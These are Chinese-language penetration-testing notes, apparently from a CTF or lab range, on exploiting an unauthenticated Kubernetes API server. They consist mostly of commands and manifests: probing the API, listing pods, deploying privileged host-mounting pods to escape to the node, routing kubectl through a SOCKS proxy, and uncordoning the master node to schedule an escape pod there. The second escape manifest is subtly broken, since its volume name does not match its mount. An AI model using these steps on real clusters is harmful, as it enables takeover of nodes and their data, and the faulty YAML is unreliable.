K8s安全

created: "2026-01-27 13:15"
tags:
  - K8s
  - API-Server未授权
aliases:
  - K8s API Server未授权访问
Type:
title:
updated: "2026-01-27 14:13"

1. API Server未授权访问

GreatWall > 7.1. k8s API Server未授权

#查看是否存在未授权
curl -k https://172.22.14.37:6443/api/v1 | jq '.resources[] | select(.name | in({"pods":1, "secrets":1, "configmaps":1, "nodes":1, "namespaces":1})) | {resource: .name, kind: .kind, verbs: .verbs}'  

#获取pod信息
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods -o jsonpath='{.items[*].spec.containers[*].image}'

用镜像创建一个恶意pod逃逸（镜像就用已有的）

#everything-allowed-exec-pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed-exec-pod
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed-pod
    image: nginx:1.8
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /

#创建恶意pod
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f k8s.yaml
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods
#进入容器，逃逸
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it everything-allowed-exec-pod  -- /bin/bash

2. k8s.yaml (代理问题)

这里因为proxychains的代理不够底层，特别是对Go语言写的程序更是基本无法代理1，这里需要把代理写入k8s.yaml

apiVersion: v1
kind: Config
clusters:
  - name: my-cluster
    cluster:
      server: https://10.68.0.1/
      insecure-skip-tls-verify: true
>>>>       proxy-url: socks5://127.0.0.1:1080 #你的代理
users:
  - name: my-user
    user:
      token: eyJhbGciOiJSUzxxxx
contexts:
  - name: my-context
    context:
      cluster: my-cluster
      user: my-user
current-context: my-context

3. master调度问题 cordon

┌──(root㉿kali)-[~/Desktop/ChunQiu/CloudNet]
└─# kubectl --kubeconfig k8s.yaml describe node master
Name:               master
Roles:              master
<SNIP>
CreationTimestamp:  Wed, 28 Aug 2024 01:04:22 -0400
>>>> Taints:             node.kubernetes.io/unschedulable:NoSchedule
>>>> Unschedulable:      true
Lease:
  HolderIdentity:  master
  AcquireTime:     <unset>
  RenewTime:       Fri, 23 Jan 2026 00:19:29 -0500
<SNIP>

可以发现master节点是不允许调度的（无法在上面创建普通pod）,可以创建静态 Pod 和DaemonSet

我们关闭cordon即可

┌──(root㉿kali)-[~/Desktop/ChunQiu/CloudNet]
└─# kubectl --kubeconfig k8s.yaml uncordon master
node/master uncordoned

4. 逃逸容器 ymal

apiVersion: v1
kind: Pod
metadata:
  name: evilmaster
spec:
  # 指定部署节点，node1, node2 或 master
  nodeName: master
  tolerations:
    - key: "node.kubernetes.io/unschedulable"
      operator: "Exists"
      effect: "NoSchedule"
  containers:
    - name: mycontainer
      image: 172.22.18.64/public/mysql:5.6
      command: ["/bin/sleep", "3650d"]
      volumeMounts:
        - name: host
          mountPath: /host
  volumes:
    - name: aaa
      hostPath:
        path: /
        type: Directory

kubectl --kubeconfig k8s.yaml apply -f master.yaml
kubectl --kubeconfig k8s.yaml get pods
kubectl --kubeconfig k8s.yaml exec -it evilmaster -- /bin/bash